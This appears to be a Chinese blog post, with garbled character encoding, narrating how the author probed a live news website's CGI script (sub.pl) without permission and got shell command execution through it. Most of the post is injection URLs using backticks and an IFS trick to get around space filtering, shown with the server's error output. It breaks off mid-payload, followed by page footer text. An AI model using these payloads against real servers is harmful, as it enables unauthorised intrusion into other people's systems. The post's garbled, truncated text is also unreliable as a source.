一個CGI漏洞的發(fā)現(xiàn)和利用
聲明:寫這個貼子的目地不是慫恿搞破壞,只是想說明一個 問題,有誰用貼子提供的信息干了什么壞事,那完全是他自 己的事,與本人無關(guān)! 前幾天在國內(nèi)的某個169節(jié)點讀新聞,這個站點頂部的一 排分類新聞的鏈接引起了我的注意,這些鏈接都指向一個 叫sub.pl的CGI,只是它們后面跟的參數(shù)不同:國內(nèi)新聞的 是sub.pl?cn,國際新聞的是sub.pl?in,財經(jīng)的是sub.pl?fi 諸如此類...跟一般的CGI程序不同,sub.pl后跟的不是通常 的key,value對,哈,讓我給sub.pl吃點洋葷,隨便自己指定 個參數(shù)給它: http://victim.net/cgi-bin/home/news/sub.pl?12 不出所料,CGI運行出錯了: /home1/siteadm/cgi-bin/home/news/log/12/*.*: 無此文件或目錄 這個CGI真是太老實了,它至少告訴了我們兩件事情:一 CGI目錄 的路徑. 二 我們輸入?yún)?shù)的作用,sub.pl的參數(shù)是在腳本中 作為目錄名.這些發(fā)現(xiàn)一下子把我興趣提了起來,再試試不同的 參數(shù)說不定有更大的發(fā)現(xiàn),經(jīng)過N次的試驗,得到的出錯信息大同 小異,值到第N+1次請求: http://victim.net/cgi-bin/home/news/sub.pl?& 服務(wù)器的返回信息有些不一樣了: sh: /WS_FTP95.exe: 不能執(zhí)行 注意到了前面的"sh:"了嗎?哈!,熟悉UNIX的朋友應(yīng)該知道,這可是 只有在shell試圖運行某個程序出錯時才會出現(xiàn)的錯誤信息.看起 來shell在試圖運行什么程序,而重要的是我們能夠影響它!怎樣去 進一步的影響它呢?反引號"`",是值得一試的: http://victim.net/cgi-bin/home/news/sub.pl?`ls` 服務(wù)器返回了奇怪的信息: /home1/siteadm/cgi-bin/home/news/log/315: 無此文件或目錄 "315"是什么東西? 再試: http://victim.net/cgi-bin/home/news/sub.pl?`id` 這次返回的信息令我大吃一驚: /home1/siteadm/cgi-bin/home/news/log/uid=999(siteadm): 無此文件或目錄 gid=999(netsite)/*.*: 無此文件或目? 很顯然,服務(wù)器運行了id,我們能利用sub.pl運行shell命令了!剛 才的ls命令也肯定運行了,"315"一定是當前CGI目錄下的子目錄. 讓我們來列一下服務(wù)器根目錄吧: http://victim.net/cgi-bin/home/news/sub.pl?`ls%/` 沒成功: sh: ls%/: 沒找到 看來,sub.pl沒有把"%"解碼成空格的習(xí)慣 :( 如何繞過這個限制 呢?相信你現(xiàn)在也已經(jīng)想到了,還得靠我們的IFS變量, 用它來指定 shell分界符.試一下: http://victim.net/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a` 服務(wù)器的回應(yīng): /home1/siteadm/cgi-bin/home/news/log/SunOS: 無此文件或目錄 victim.net: 無此文件或目錄 5.5.1: 無此文件或目錄 Generic_103640-27: 無此文件或目錄 sun4u: 無此文件或目錄 sparc: 無此文件或目錄 SUNW,Ultra-2/*.*: 無此文件或目錄 成功了!現(xiàn)在我們差不多有了shell訪問權(quán)限,對SunOS這樣的系統(tǒng),拿 到root只是時間問題了.沒有必要再繼續(xù)下去,我不想搞破壞,對sub.pl 瞎子摸象式的攻擊已經(jīng)給了我足夠的樂趣. :) 當然我還有興趣看 看問題到底出在哪,把sub.pl弄下來看看: 當然這還得靠sub.pl :) http://victim.net/cgi-bin/home/news/sub.pl?`cat
- TEL:131 7970 3111
-
慧網(wǎng)微信
- 掃描二維碼
- 關(guān)注邳州在線
-
手機網(wǎng)站
- 手機掃描二維碼
- 進入手機站
網(wǎng)站地圖
付款方式